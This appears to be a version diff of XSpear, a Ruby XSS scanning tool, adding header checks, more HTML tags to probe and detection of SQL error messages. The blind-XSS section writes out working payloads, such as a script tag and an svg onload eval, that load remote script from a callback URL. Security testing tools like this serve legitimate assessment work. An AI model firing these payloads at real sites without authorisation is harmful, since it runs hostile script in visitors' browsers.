-  VERSION = "1.0.5"
+  VERSION = "1.0.6"
 end

data/lib/XSpear.rb CHANGED Viewed

@@ -26,16 +26,17 @@ class XspearScan
     @output = output
     @verbose = verbose
     @blind_url = blind
-    @report = XspearRepoter.new @url, Time.now
+    @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
     @filtered_objects = {}
   end
   class ScanCallbackFunc
-    def initialize(url, method, query, response)
+    def initialize(url, method, query, response, report)
       @url = url
       @method = method
       @query = query
       @response = response
+      @report = report
       # self.run
     end
@@ -64,40 +65,92 @@ class XspearScan
   class CallbackNotAdded < ScanCallbackFunc
     def run
       if @response.body.include? @query
-        log("i","reflected #{@query}")
+        time = Time.now
+        puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] reflected #{@query}"
         [false, true]
       else
-        [false, false]
+        [false, "Not reflected #{@query}"]
       end
     end
   end
+  class CallbackCheckHeaders < ScanCallbackFunc
+    def run
+      if !@response['Server'].nil?
+        # Server header
+        @report.add_issue("i","s","-","-","original query","Found Server: #{@response['Server']}")
+      end
+      if @response['Strict-Transport-Security'].nil?
+        # HSTS
+        @report.add_issue("i","s","-","-","original query","Not set HSTS")
+      end
+      if !@response['Content-Type'].nil?
+        @report.add_issue("i","s","-","-","original query","Content-Type: #{@response['Content-Type']}")
+      end
+      if !@response['X-XSS-Protection'].nil?
+        @report.add_issue("i","s","-","-","original query","Not set X-XSS-Protection")
+      end
+      if !@response['X-Frame-Options'].nil?
+        @report.add_issue("i","s","-","-","original query","X-Frame-Options: #{@response['X-Frame-Options']}")
+      else
+        @report.add_issue("l","s","-","-","original query","Not Set X-Frame-Options")
+      end
+      if !@response['Content-Security-Policy'].nil?
+        begin
+          csp = @response['Content-Security-Policy']
+          csp = csp.split(';')
+          r = " "
+          csp.each do |c|
+            d = c.split " "
+            r = r+d[0]+" "
+          end
+          @report.add_issue("i","s","-","-","original query","Set CSP(#{r})")
+        rescue
+          @report.add_issue("i","s","-","-","original query","CSP ERROR")
+        end
+      else
+        @report.add_issue("m","s","-","-","original query","Not Set CSP")
+      end
+      [false, "not reflected #{@query}"]
+    end
+  end
   class CallbackErrorPatternMatch < ScanCallbackFunc
     def run
       info = "Found"
       if @response.body.to_s.match(/(SQL syntax.*MySQL|Warning.*mysql_.*|MySqlException \(0x|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|MySqlClient\.|com\.mysql\.jdbc\.exceptions)/i)
-        info = info + "MYSQL "
+        info = info + "MYSQL Error"
       end
       if @response.body.to_s.match(/(Driver.* SQL[\-\_\ ]*Server|OLE DB.* SQL Server|\bSQL Server.*Driver|Warning.*mssql_.*|\bSQL Server.*[0-9a-fA-F]{8}|[\s\S]Exception.*\WSystem\.Data\.SqlClient\.|[\s\S]Exception.*\WRoadhouse\.Cms\.|Microsoft SQL Native Client.*[0-9a-fA-F]{8})/i)
-        info = info + "MSSQL "
+        info = info + "MSSQL Error"
       end
       if @response.body.to_s.match(/(\bORA-\d{5}|Oracle error|Oracle.*Driver|Warning.*\Woci_.*|Warning.*\Wora_.*)/i)
-        info = info + "Oracle "
+        info = info + "Oracle Error"
       end
       if @response.body.to_s.match(/(PostgreSQL.*ERROR|Warning.*\Wpg_.*|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near)/i)
-        info = info + "Postgres "
+        info = info + "Postgres Error"
       end
       if @response.body.to_s.match(/(Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access)/i)
-        info = info + "MSAccess "
+        info = info + "MSAccess Error"
       end
       if @response.body.to_s.match(/(SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|\[SQLITE_ERROR\])/i)
-        info = info + "SQLite "
+        info = info + "SQLite Error"
       end
       if @response.body.to_s.match(/(Warning.*sybase.*|Sybase message|Sybase.*Server message.*|SybSQLException|com\.sybase\.jdbc)/i)
-        info = info + "SyBase "
+        info = info + "SyBase Error"
       end
       if @response.body.to_s.match(/(Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)/i)
-        info = info + "Ingress "
+        info = info + "Ingress Error"
       end
       if info.length > 5
@@ -248,7 +301,17 @@ class XspearScan
     ]
     tags = [
         "script",
-        "iframe"
+        "iframe",
+        "svg",
+        "img",
+        "video",
+        "audio",
+        "meta",
+        "object",
+        "embeded",
+        "style",
+        "frame",
+        "frameset"
     ]
     special_chars =[
         ">",
@@ -274,11 +337,12 @@ class XspearScan
     ]
     log('s', 'creating a test query.')
+    r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
     r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
     r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
     # Check Special Char
     special_chars.each do |sc|
-      r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
+      r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
     end
     # Check Event Handler
@@ -306,8 +370,10 @@ class XspearScan
     # Check Blind XSS Payload
     if !@blind_url.nil?
-      payload = "<script src=#{@blind_url}></script>"
-      r.push makeQueryPattern('f', "\"'>#{payload}", "NOTDETECTED", 'i', "", CallbackNotAdded)
+      r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
+      r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
+      r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
+      r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
     end
     r = r.flatten
@@ -328,10 +394,10 @@ class XspearScan
           if result[0]
             log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
             @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
-          elsif node[:callback] == CallbackNotAdded
+          elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
             @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
           else
-            log('d', (result[1]).to_s)
+            log('d', "'#{node[:param]}' "+(result[1]).to_s)
           end
           rescue => e
           end
@@ -358,11 +424,11 @@ class XspearScan
     result = []
     if type == 's'
-      result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
-      unless @data.nil?
+      if @data.nil?
+        result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+      else
         result.push("inject": 'body',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
       end
-      p result
     else
       uri = URI.parse(@url)
       begin
@@ -432,7 +498,7 @@ class XspearScan
           end
         end
         response = http.request(request)
-        result = callback.new(uri.to_s, method, pattern, response).run
+        result = callback.new(uri.to_s, method, pattern, response, @report).run
         # result = result.run
         # p request.headers
         return result, response

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.0.5
+  version: 1.0.6
 platform: ruby
 authors:
 - hahwul
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2019-07-22 00:00:00.000000000 Z
+date: 2019-07-23 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -144,6 +144,7 @@ executables:
 extensions: []
 extra_rdoc_files: []
 files:
+- ".github/FUNDING.yml"
 - ".gitignore"
 - ".idea/XSpear.iml"
 - ".idea/encodings.xml"